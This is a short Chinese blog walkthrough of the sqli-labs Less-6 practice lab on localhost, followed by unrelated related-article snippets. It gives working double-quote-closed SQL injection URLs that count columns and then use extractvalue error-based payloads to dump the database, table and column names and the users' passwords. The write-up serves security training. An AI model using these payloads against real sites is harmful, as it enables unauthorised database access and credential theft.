SQL注入第6关

ops/2025/3/19 1:44:52/

存在SQL注入,且闭合为双引号

查询数据库列数:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 3--+

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 4--+

查询可知列数为3

查询数据库库名:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e))--+ 

查询数据库中的表名:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+ 

查询users表中的字段:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'  and table_schema='security'),0x7e))--+ 

查询表内容:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password)) from security.users),0x7e))--+


http://www.ppmy.cn/ops/166917.html

相关文章

「Unity3D」UGUI运行时设置元素的锚点Anchor,维持元素Rect的显示不变,即待在原处

在编辑器中,通过设置Raw edit mode,可以切换两种,元素锚点的改变模式: 一种是锚点单独改变,即:不开启原始模式,保持原样,改变anchoredPosition与sizeDelta。一种是锚点联动显示&…

【漫话机器学习系列】139.标量(Scalars)

标量(Scalars)概述 1. 什么是标量? 在数学和计算机科学中,标量(scalar) 是一种最基本的数据类型,它指的是单个数值,如 4 或 4.02。标量与向量(vector)、矩阵…

在vue项目中,使用Patch请求,实现根据id修改某张发票的日结状态

目录 前言 一.问题描述 二.后端实现 1.分析 2.检查后端拦截器,看看是否允许接收Patch类型的请求 3.编写Dto 4.编写controller层 5.编写service层 6.mapper层 7.使用apifox,测试后端接口的可用性 三.前端实现 1.封装api(本质是ax…

2025深圳国际数字能源展全球招商启动,聚焦能源产业数字化转型

近日,2025深圳国际数字能源展组委会正式宣布,展会将于9月18 - 21日在深圳会展中心盛大举行,目前全球招商已全面启动。该展会旨在汇聚全球数字能源领域的前沿技术与创新成果,推动能源产业的数字化转型,助力构建绿色、高…

网络华为HCIA+HCIP数据链路层协议-以太网协议

以太网协议 以太网是当今现有局域网(Local Area Network,LAN)采用的最通用的通信协议标准,该标准定义了在局域网中采用的电缆类型和信号处理方法。以太网是建立在CSMA/CD(Carrier Sense Multiple Access/Collision Detection,载波监听多路访问/冲突检测)机制上的广…

人工智能与人的智能,改变一生的思维模型分享【4】决策树

决策树( DECISION TREE) 一般由一个决策图和若干可能的结果组成。是一种通过罗列解题的关键步骤以及各步骤发生的条件和结果,由此来创建到达目标的规划。 我们很早就知道有一个方法,叫做当你苦闷、纠结的时候,把你的所…

设计模式,持续更新

创建型 简单工厂 public interface Product{}public class ConcreteProduct implements Product { } public class ConcreteProduct1 implements Product { } public class ConcreteProduct2 implements Product { } public class SimpleFactory{public Product createProduc…

TCP/IP四层网络模型

TCP/IP四层网络模型 TCP/IP四层网络模型OSI七层网络模型总结记忆描述 整理一下TCP/IP四层网络模型和OSI七层网络模型的知识点。 TCP/IP四层网络模型 TCP/IP模型是互联网的基础,它由以下四层组成: 应用层(Application Layer)&…